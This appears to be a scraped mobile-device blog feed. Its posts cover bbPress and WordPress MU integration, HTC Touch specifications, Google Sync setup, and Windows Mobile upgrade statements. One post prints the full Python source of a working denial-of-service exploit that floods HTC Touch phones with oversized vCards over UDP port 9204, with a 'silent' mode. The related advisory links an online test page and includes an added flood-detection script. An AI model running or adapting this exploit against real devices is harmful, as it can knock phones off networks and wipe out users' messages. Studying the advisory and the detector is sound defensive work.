
BB-Press Forum and WordPress mu (wpmu) integrated!

11:23 pm in Latest News by buzz_lightyear

Yeah! I’ve just successfully finished Main site and forum integration.

That is, cookies and database are now integrated. :) So once you are logged in at the main page, you are also logged in to the forums. That’s really great :) Sorry, I can’t help myself, but I am happy that it is really working :)

Please test it at: http://buzzdev.org/forums/

Now I have to complete the “deep integration”, which is to embed the forum into the main site and make it look acceptable. The default bb-press theme is horrible…

One day I also have to post how the cookie and database integration is done, in case someone else would like to integrate WPMU with bb-press.

vCard over IP Denial of Service exploit

9:50 am in HTC devices, Latest News, Mobile Security, Windows Mobile by buzz_lightyear

Below is the source code for the HTC Touch vCard DoS exploit.

#! /usr/bin/env python
#
# Copyright (c) 2009 Mobile Security Lab www.mseclab.com
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#

from socket import *
from sys import exit,argv
from time import *
import random
from optparse import OptionParser

# Global Variables
PORT = 9204
DEF_NUM_PACKETS = 10
DEF_VCARD_LEN = 1410
DEF_DELAY = 0.7
VCARD_HEADER = "BEGIN:VCARD\r\nVERSION:2.1\r\nN:"
VCARD_TRAILER = "\r\nEND:VCARD\r\n"

def main():
    # Local variables
    num_packets = DEF_NUM_PACKETS
    delay = DEF_DELAY

    print "\nMSL-2008-002 PoC for HTC Touch\nMobile Security Lab 2009\n"
    # Parsing options
    parser = OptionParser("usage: %prog [options] target_IP")
    parser.add_option("-s", "--silence", action="store_true", dest="silence", help="send silent vcards (32k)")
    parser.add_option("-c", "--count", type="int", help="specify number of vcards to send", dest="count")
    parser.add_option("-d", "--delay", type="float", help="specify delay between packets", dest="delay")
    parser.add_option("-l", "--len", type="int", help="specify vcard length", dest="len")
    parser.add_option("-t", "--text", type="string", help="specify vcard body text", dest="text")

    # Parse input
    (options, args) = parser.parse_args()
    if len(args) != 1:
        parser.print_help()
        print ""
        exit(1)

    if options.count:
        num_packets = options.count

    if options.delay:
        delay = options.delay

    if options.silence:
        vcard_body = VCARD_HEADER+'A' *32722+VCARD_TRAILER
    elif options.len:
        vcard_body = VCARD_HEADER+'A' *options.len+VCARD_TRAILER
    elif options.text:
        vcard_body = VCARD_HEADER+options.text+VCARD_TRAILER
    else:
        vcard_body = VCARD_HEADER+'A' *DEF_VCARD_LEN+VCARD_TRAILER

    # Socket creation
    udp_sock = socket(AF_INET, SOCK_DGRAM)
    ADDR = (args[0],PORT)

    # Start sending packet
    counter = 1
    c_lap = 0
    total_data = 0
    print "Sending %d packets... to %s" % (num_packets,ADDR)
    start_time = time()
    start_lap = time()

    # Start sending packet
    while counter <= num_packets:
        len_sent = udp_sock.sendto(vcard_body,ADDR)
        if len_sent != len(vcard_body):
            print "Error sending packet n.%d" %counter
            break

        # Update Counter
        counter += 1
        c_lap += 1
        total_data += len_sent

        # Sleep for letting the device parse vcards
        sleep(delay)

        # Check number of packets in a second
        local_lap = time()
        if local_lap - start_lap >= 1:
            print "%0.2f packets/sec" % (c_lap/(local_lap - start_lap))
            start_lap = local_lap
            c_lap = 0

    stop_time = time()
    stop_sec = stop_time - start_time

    # Display info
    print "Sent %d packets in %f seconds" % (num_packets, stop_sec)
    print "Start time: %s" %ctime(start_time)
    print "Stop time: %s" %ctime(stop_time)
    print "Payload Len = %d bytes" % len(vcard_body)
    print "Total Data sent = %d bytes (about %0.2f kB)" % (total_data, (float(total_data)/float(1024)))

#Global start
if __name__ == "__main__":
    main()

# milw0rm.com 2009-03-02

HTC Touch vCard over IP Denial of Service

9:42 am in Latest News, Mobile Security, Windows Mobile by buzz_lightyear

“You are browsing with your shiny smartphone while being connected to a wireless LAN.
Suddenly you receive a single SMS carrying a new contact information.
You don’t even have time to check it before your SMS inbox starts filling with unwanted messages, and you don’t seem to be able to stop it…”

This is a possible scenario that may happen if you are the victim of a vCard Denial of Service.

If you are curious how that really works, try it out on your own device.
Open the URL below in your HTC Touch and press a button.

Exploit test: http://poc.mseclab.com/MSL-2008-002_Test.html

Vulnerability Details

Vendor: HTC

Platforms: Touch Pro, Touch Cruise

Class: Denial of Service

Remote: Yes

Local: No

Public References: Not Assigned

Affected: HTC Touch Pro, HTC Touch Cruise

Not Affected: Currently Unknown

Description

UDP port 9204 is open and reachable both via WiFi and via GPRS/UMTS connections when the device is capable of sending and receiving SMS.
The port is always open on the Touch Pro, while on the Touch Cruise it is open when the SMS application is running.

UDP/9204 is associated with the WAP-vCard service and is used for sending vCard files to the device, which are displayed to users as normal SMS messages.
By flooding the device with multiple vCards it is possible to perform a Denial of Service attack that affects usability, SMS handling and connectivity.
By sending a large number of vCards an attacker can cause a significant device slowdown, making the UI sluggish and hard to use.
In some cases WiFi connections may be dropped (when the vCards are sent via WiFi), effectively disconnecting the device from the network.

On Touch Cruise devices, the SMS inbox can be completely filled by sending more than 450 large vCards (32K each).
The device will then be unable to receive SMS or to access the messages already stored on it until messages are deleted.
Additionally, when large vCards are sent, no acoustic notification (ring tone) is played for incoming messages, making the attack quieter and less noticeable to the user.

Battery removal may be needed in some cases to restore normal functionality.
Deleting the received messages one by one takes a very long time, so deleting all SMS at once is the most viable option; that, however, loses every received SMS and still takes a large amount of time (even hours).
The fastest way to restore the device is a hard reset, which loses all content saved on the handset.

The attack can easily be carried out in any scenario where the device’s IP stack is reachable by an attacker, such as wireless LANs and mobile networks that assign public IP addresses without any firewall protection.
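A defender-side counterpart to the description above, added here as an example and not part of the mseclab advisory or its PoC: a small Python detector that reads per-datagram firewall or flow log lines (a constructed, hypothetical format) and raises an alert when one source sends more UDP/9204 datagrams to a handset than a threshold within a short window, or sends a single datagram in the roughly 32K “silent” size range. The port number and the 32K size come from the advisory; the log format, window length and thresholds are assumptions.

```python
import re
from collections import defaultdict, deque

# From the advisory: the WAP-vCard service listens on UDP/9204.
VCARD_PORT = 9204
# The advisory's "silent" vCards are about 32K; the cut-off below is an assumption
# (the PoC's -s option builds a body of 32722 'A's inside a 41-byte vCard frame).
LARGE_VCARD_LEN = 32000
# Rate thresholds are assumptions for this example, not advisory values.
WINDOW_SECONDS = 5.0
MAX_DATAGRAMS_PER_WINDOW = 20

# Hypothetical per-datagram log format: "<epoch> <src_ip> <dst_ip> <proto> <dport> <len>"
LINE_RE = re.compile(
    r"^(?P<ts>\d+(?:\.\d+)?)\s+(?P<src>\S+)\s+(?P<dst>\S+)\s+"
    r"(?P<proto>\S+)\s+(?P<dport>\d+)\s+(?P<len>\d+)$"
)


def parse_line(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"ts": float(m["ts"]), "src": m["src"], "dst": m["dst"],
            "proto": m["proto"].upper(), "dport": int(m["dport"]), "len": int(m["len"])}


def detect_vcard_flood(lines, window=WINDOW_SECONDS, max_per_window=MAX_DATAGRAMS_PER_WINDOW):
    """Return alerts as (kind, src, dst, ts) tuples, in the order they are raised.

    kind is "vcard_flood" (more than max_per_window datagrams from src to dst:9204
    inside a sliding window of `window` seconds; raised once per src/dst pair) or
    "silent_vcard" (a single datagram of LARGE_VCARD_LEN bytes or more).
    """
    alerts = []
    recent = defaultdict(deque)   # (src, dst) -> timestamps of recent vCard datagrams
    flood_flagged = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["proto"] != "UDP" or rec["dport"] != VCARD_PORT:
            continue
        key = (rec["src"], rec["dst"])
        if rec["len"] >= LARGE_VCARD_LEN:
            alerts.append(("silent_vcard", rec["src"], rec["dst"], rec["ts"]))
        q = recent[key]
        q.append(rec["ts"])
        while q and rec["ts"] - q[0] > window:   # drop timestamps outside the window
            q.popleft()
        if len(q) > max_per_window and key not in flood_flagged:
            flood_flagged.add(key)
            alerts.append(("vcard_flood", rec["src"], rec["dst"], rec["ts"]))
    return alerts


# Constructed sample log: one ordinary vCard, then a burst of 25 default-sized PoC
# datagrams (1410-byte body + 41-byte frame = 1451 bytes) 0.2 s apart, one ~32K
# "silent" vCard, and one unrelated TCP flow.
SAMPLE_LOG = (
    ["1229680000.0 10.0.0.7 10.0.0.20 UDP 9204 312"]
    + ["%.1f 10.0.0.5 10.0.0.20 UDP 9204 1451" % (1229680010.0 + 0.2 * i) for i in range(25)]
    + ["1229680020.0 10.0.0.5 10.0.0.20 UDP 9204 32763"]
    + ["1229680021.0 10.0.0.9 10.0.0.20 TCP 80 512"]
)

if __name__ == "__main__":
    for kind, src, dst, ts in detect_vcard_flood(SAMPLE_LOG):
        print("%-13s %s -> %s at %.1f" % (kind, src, dst, ts))
```

On the sample log the burst trips the flood alert at its 21st datagram and the 32763-byte datagram trips the silent-vCard alert; the ordinary vCard and the TCP flow produce nothing.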

Solutions and Workaround

A personal firewall solution can be used for denying unwanted access to the port, effectively avoiding possible attacks.

Additional Info

Timeline:
2008-12-03: Issue discovery
2008-12-05: Initial Vendor Notification: Point of Contact requested via contact form on website (No suitable e-mail available)
2008-12-14: Vendor Response: Customer support answered without providing any suitable contact for vulnerability communication
2008-12-19: Public Disclosure

Vendor Statement: None

Exploit example: Source code by mseclab

Published by Mobile Security Lab on 2008-12-19.

New HTC Touch Cruise in detail

9:20 am in HTC devices, Latest News, Windows Mobile by buzz_lightyear

Overview

The All new HTC Touch Cruise™ is intelligent enough to help you navigate from point A to point B, but that is just the beginning. With the introduction of HTC Footprints™, you have a mobile phone that lets you grasp all the precious details of the instances that make up your life.

Your Life Chronicles

We all strive to capture and hang on to the moments that touch our life. The HTC Touch Cruise™ does just that. Take a picture and the HTC Footprints™ automatically saves your location. Embellish your instance further by adding the thoughts that surrounded that special moment. You can even grab the sound of your friend’s laughter to go along with your memory.

The best part about HTC Footprints™ is that you can use them to find your way back to the hidden little café you visited last year, or the elm tree under which your loved one popped the big question. And if you want, you can simply flip through your collection and laugh about the times that helped create who you are today. HTC Footprints™ is like a journal of your life’s highlights, making them always within your reach.


Highlights

  • HTC Footprints™: lets you create a vivid collection of your life’s chronicles.
  • Navipanel Mode: transforms your smartphone into a simple to use turn-by-turn navigator.
  • 3.2 Megapixel Camera: 3.2 megapixel camera with geotagging so you can always return to your favorite spots.
  • Internet Connectivity: internet connectivity reaching broadband speeds.


Specification

Processor

  • Qualcomm® MSM7225™, 528 MHz

Operating System

  • Windows Mobile® 6.1 Professional

Memory ROM

  • 512 MB

RAM

  • 256 MB

Dimensions

  • 102mm (L) x 53.5mm (W) x 14.5mm (T)

Weight

  • 103g (with battery)

Display

  • 2.8” TFT-LCD touch-sensitive screen with QVGA resolution

Network

  • HSDPA/WCDMA
    Europe/Asia: 900/2100 MHz
    Up to 384kbps up-link and up to 7.2Mbps down-link speeds
  • Quad-band GSM/GPRS/EDGE:
    850/900/1800/1900MHz
    (Band frequency and data speed are operator dependent)

Device Control

  • HTC TouchFLO™
  • 4-Way Navigation Wheel with Enter button
  • HTC Footprint™ button

GPS

  • Internal GPS antenna
  • A-GPS capable (service provided by Google)

Connectivity

  • Bluetooth® 2.0 with EDR and A2DP for stereo wireless headsets
  • Wi-Fi®: IEEE 802.11 b/g
  • HTC ExtUSB™ (11-pin mini-USB 2.0 and audio jack in one), full-speed USB 2.0

Camera

  • 3.2 mega-pixel colour camera

Audio Supported Format

  • AAC, AAC+, eAAC+, AMR, AWB, QCP, MP3, WMA, WAV and MIDI

Video Supported Format

  • WMV, ASF, MP4, 3GP, 3G2, M4V and AVI

Battery

  • 1100mAh rechargeable Lithium-ion battery

Talk time

  • Up to 375 minutes for WCDMA
  • Up to 400 minutes for GSM

Standby time

  • Up to 400 hours for WCDMA
  • Up to 330 hours for GSM

(The above are subject to network and phone usage)

Expansion Slot

  • microSD™ memory card (SD 2.0 compatible)

AC Adaptor

  • Voltage range/frequency: 100-240V AC, 50/60Hz, DC output: 5V and 1A

Special Features

  • Includes proprietary in-car holder, photo geotagging



GoogleSync for Windows Mobile, iPhone, BlackBerry & others

3:46 pm in Latest News by buzz_lightyear

Google launched GoogleSync [beta] for your mobile phone on Monday.
It should be able to sync:

  • Windows Mobile
  • iPhone
  • Blackberry
  • Nokia S60
  • Nokia standard
  • Sony Ericsson

Features

Synchronize your contacts.
Get your Google contacts quickly and easily to your phone. With Sync, you can have access to your address book at anytime and place that you need it.

Get calendar alerts.
Using your phone’s native calendar, you can now access your Google calendar, and be alerted for upcoming appointments with sound or vibration.

Always in sync.
Your contacts stay synchronized whether you access them from your phone or from your computer. Add or edit contact information right on your device or on your Google account on the web.

Important!
Google Sync uses the Microsoft© Exchange ActiveSync© protocol. When setting up a new Exchange ActiveSync account on your phone, all existing Contacts and Calendar events may be removed. Please make sure to back up any important data before you set up Google Sync.

How to set up GoogleSync
To set up Google Sync on your Windows Mobile device, please follow the steps below.

Important Note: Make sure that you have backed up any Contacts and Calendars from your phone to your computer before proceeding.

Getting Started
1. Open the Active Sync application on your device’s home screen.
2. Click the link Set up your device to sync with it.
3. Enter m.google.com as the server address.
4. Ensure that the SSL option is checked.


Sign In to Google Account
5. Click Next.
6. Enter your full Google Account email address as the User name.
7. Enter your Google Account password as the Password.
8. Leave the Domain field empty.
9. Click Next.
10. Check only Contacts and Calendar.
11. Click Finish.


12. Press the Sync softkey on the left to synchronize.


You’ve now set up Google Sync for your Windows Mobile device.

Video:

GoogleSync for your mobile

Windows Mobile 6: upgrade strategy statement

12:21 am in Latest News, Windows Mobile by buzz_lightyear

Source: HTC News

Microsoft recently unveiled Windows Mobile® 6, which offers improved usability and more PC-like functionality than previously available.
Enhancements include the ability to view emails in rich HTML format, and to manage emails quickly and easily through new shortcuts and new calendar views.
The HTC S710 is one of the first Windows Mobile® 6 devices to ship, and will be followed by a range of products based on the new operating system in the coming months.
HTC is also offering WM6 upgrades for the most popular devices in its current range. This includes recently launched “messaging” products, which will enjoy the greatest benefits of Windows Mobile 6, such as the HTC Advantage, the HTC TyTN, the HTC S620, and the HTC P4350. The upgrade will also be available for the award-winning HTC P3300, plus some of our operator-branded devices.
The upgrades will be rolled out from June, in line with our operator partners’ strategies.
You’ll be able to find the latest releases as they’re made available at: http://downloads.europe.htc.com

Additional Qs for reactive use only:

Why have these devices been chosen?

We have chosen devices with a particular focus on “messaging”, where users will enjoy the greatest benefits of Windows Mobile 6 (the HTC Advantage, the HTC TyTN, the HTC S620, and the HTC P4350). The upgrade will also be available for the award-winning HTC P3300.

Will other devices be added?

Potentially. We’re in constant discussions with our operator partners, and if they’re seeing significant demand from their customers for a specific device then we will always consider it.

When will the upgrade be available?

The upgrades will be rolled out from April.

I’ve heard that [operator] is not offering the upgrade. Why is that? Can their customers get the upgrade from HTC direct?

It’s really up to the operators to decide how, or indeed whether, to offer the upgrade, so you’d need to speak to them. HTC is only directly offering upgrades for its own brand devices.

Will consumers have to pay upgrade license fees?

No, the usual licence upgrade fees are being waived.

How much of a difference will users notice with the new operating system?

Windows Mobile 6 delivers the ability to view e-mails in their original rich HTML format with live links to Web and SharePoint® sites, which means text and images are displayed as they would be on a PC, and are available from a corporate e-mail server such as Exchange Server 2007, from Web-based accounts such as Windows Live™ Hotmail or from a myriad of other popular service providers. Windows Mobile 6 also includes Windows Live for Windows Mobile, which provides customers with a rich set of Windows Live services. For example, now through Windows Live Messenger, people can chat with more than one person at one time, express themselves through animated figures, quickly send a file or image, or record and send voice notes.
The newest version of the platform offers the most genuine Microsoft Office system experience in the mobile versions of Office Outlook®, Office Word, Office Excel® and Office PowerPoint® by bringing capabilities once available only on the PC versions of these products to the small screen. This allows users to neatly view, navigate and edit Word documents and Excel spreadsheets in their original formatting, without affecting tables, images or text, and to view PowerPoint presentations on their device.
All Windows Mobile 6 powered devices include Direct Push Technology for up-to-date e-mail delivery and automatic synchronization of Outlook calendars, tasks and contacts through Microsoft Exchange Server.
Windows Mobile 6 also offers a set of important device security and management features that include the capability to remotely wipe all data from a device should it be lost or stolen, helping ensure that confidential information remains that way.

About HTC

Founded in 1997, High Tech Computer Corp. (HTC) designs, manufactures and markets innovative, feature rich smartphone and PDA phone devices.
Since its establishment, HTC has developed strong R&D capabilities, pioneered many new designs and product innovations, and launched state-of-the-art PDA Phones and Smartphones for mobile operators and distributors in Europe, the US, and Asia. These machines are available as HTC devices and as products individually customized for operator and device partners.
HTC is one of the fastest growing companies in the mobile device market. The company is listed on the Taiwan Stock Exchange under ticker 2498. For more information about HTC, please visit http://www.htc.com

Sumsing Turbo 3000Xi Multitask

12:04 am in Latest News by buzz_lightyear

Guys, you cannot miss this one.

When I saw it, I knew that we could throw our today’s PDA “top technology” phones out of the window…
Here comes the greatest Sumsing Turbo 3000Xi Multitask mobile phone:


Why there is no WM5 for my device available?

11:43 pm in Latest News, Windows Mobile by buzz_lightyear

Finally, the word from Microsoft is out.
Again, it was Mike Calligaro who wrote this cool article on why there is no WM5 upgrade for this or that device.
I suggest you read that one.

From msdn blogs:

Why Can’t I Upgrade?

We released Windows Mobile 5 a few months ago and devices are starting to hit the market now.  A question I’ve seen asked in a number of places is, “Why can’t I upgrade my existing WM 2003 SE devices to WM5?”

The answer is sure to get me a bunch of angry comments from people who abbreviate our name “M$.”  You can choose to see this as spin from a greedy marketing wonk, or you can see it for what it is–an honest attempt from a developer to explain how this stuff works.

Possible vs. Practical
Since 2002, we’ve set our hardware requirements and designed our software to make it possible to upgrade any PocketPC or Smartphone at least once.  And there have been a number of devices that have upgraded from one version to the next.  Also, some of our partners have announced that some of their WM 2003 SE devices will be upgraded to WM5.  But, by and large, the number of devices that will upgrade is pretty small.

The trouble is, while it’s possible to upgrade devices, it’s often not practical to do so.  The reason it’s not practical boils down this:
1) It costs a lot of money to upgrade a device
2) So few people upgrade that it’s hard to amortize this cost

Second things First
I know that it’s frustrating to want to upgrade and hear me say, “But no one upgrades.”  Obviously you want to upgrade.  You wouldn’t be reading this if you didn’t.  And, I’ll bet you know a bunch of people who want to upgrade as well.  Please understand, the companies involved do not say, “Hey, let’s not bother to upgrade the device.  We won’t piss off too many people.”  Everyone wants to upgrade your devices.  There are a number of reasons for this, not the least of which is that we know that providing upgrades makes customers happy.  And, yes, we all like happy customers.

It’s not about figuring out how many people we can get away with annoying.  Upgrades don’t happen due to a much simpler calculation.

(Total cost of doing the upgrade) / (number of people who will use it) = (unreasonable price)

The value of “unreasonable price” varies from situation to situation.  But there have been times where it was higher than the price of a new phone.  Because there have been upgrades in the past, we know how many people do them.  And, even though you know a bunch of people who want to upgrade, it’s still a tiny percentage of the owners of that device.

Show me the Money
So what are all these costs?  The first is the cost of developing and testing all the drivers for a new version of the OS.  While Microsoft writes the bulk of the software on a WM device, a significant amount of it is written by the OEM or ODM who created the hardware.  And the part they do is the most complicated part of the device: the drivers, parts of the kernel, and the radio stack.  On major OS revisions, many of these parts need to be changed, sometimes dramatically.  And, any time they need to be changed, extensive testing needs to be done.

Another cost is associated with phone devices sold through Mobile Operators.  MOs rightfully want to be sure that any device on their network doesn’t interfere with other devices on their network.  To do this, they put every device they plan to sell through a battery of tests that last weeks.  If a significant amount of code on the device changes, it needs to be retested.  And that takes away testing time from another device.  The Mobile Operator needs to make a conscious decision to test an upgrade that few people will use instead of testing a sexy new phone that potentially many more will buy.

Another cost comes from how difficult it is to upgrade these devices.  The steps are complicated, there are changes that users don’t expect, and sometimes it doesn’t work.  All of those situations result in calls to product support, which are really expensive.  Yes, you’re capable of pulling off the upgrade.  But you’re techy enough to be reading an MSDN site.  How do you think your grandmother would fare?

Well, what are you doing about it?
In WM5 we spent a lot of time building an infrastructure for enabling updates that anyone can do.  We’re heading toward a Windows Update sort of experience, where you’re using your phone and it suddenly pops up a box that says something like, “An update is available, would you like to have it installed?”  Then you just need to select “Yes” and it’ll happen for you.  How much OEMs and Mobile Operators make use of this infrastructure is up to them, but it’s there now.  This should solve the “could your grandmother do it?” problem, especially for smaller updates like security fixes.

Of course, to do this, we had to change a ton of stuff, which makes the first two problems even bigger for this release.  No pain, no gain.

We’re doing a few things to make future updates easier for OEMs and Mobile Operators.  First, we’re going to try to do some smaller releases that don’t require changes in OEM code.  If the drivers don’t need to change, then it’s much easier for the OEM to take an update from us and make it work.  The Mobile Operators will still want to test the device, but, hopefully, if the drivers didn’t change, they can have some assurance that the things they worry most about didn’t change either.  That should make their testing easier.

Longer term, we’re looking at ways to design our OS so that even major revisions don’t require significant driver changes.  We don’t know for sure that we’ll be able to pull that off, but it’s a goal we’re striving toward.

No it’s not just “greed”
I’ve seen people complain that upgrades don’t happen because the parties involved are just greedy.  I guess there’s a fine line between “economics” and “greed” but that line does exist.  The economics of the situation are that it often just doesn’t make sense to provide an upgrade.  We’re working on both parts of that equation.  We’re trying to reduce the total upgrade cost, and make upgrading easy enough that more people will make use of it.  Whether this work will result in more upgrades being provided in the future remains to be seen.  But we hope so.

Mike Calligaro
MS Windows Mobile Team

My Himalaya & Time Travel

3:51 pm in Latest News by genesis

I guess all Himalaya users out there will agree that owning this device was one of the smartest investments ever for an enthusiast. According to Albert Einstein’s theory of relativity, time can be relative depending on where you are. A simple example is riding a train for a minute or watching for a minute as the train passes you by at blazing speed. If there is such a thing as time travel, a Himalaya user has already experienced it. I’ve been a Himalaya user for four months and this device has been leapfrogging me through time. It all started with my simple quest of having a landscape view in my Excel application. Out of the box with a 1.66 WWE mobile OS, it has evolved into one of the most successful hardware devices, with a myriad of upgrades and software available. Of course, this has been made possible by the triumvirate whom I call xtb. Their tremendous creativity and patience in software development have given me the channel to engage in time travel with my Himalaya. Now running Magneto, it has transformed my device into a behemoth in the world of Pocket PC, tossing me through time at blinding speed.

Quoting one of my brothers and gurus, he said: “running Magneto on my Himalaya is like putting Windows XP on your Pocket PC”. Indeed it is!

But equally important is the working relationship of the triumvirate I call xtb. Their sheer determination and passion for the Himalaya have been colossal. I just hope that they continue their working relationship, of course with the support of the brotherhood in the Himalaya World. More power to the triumvirate!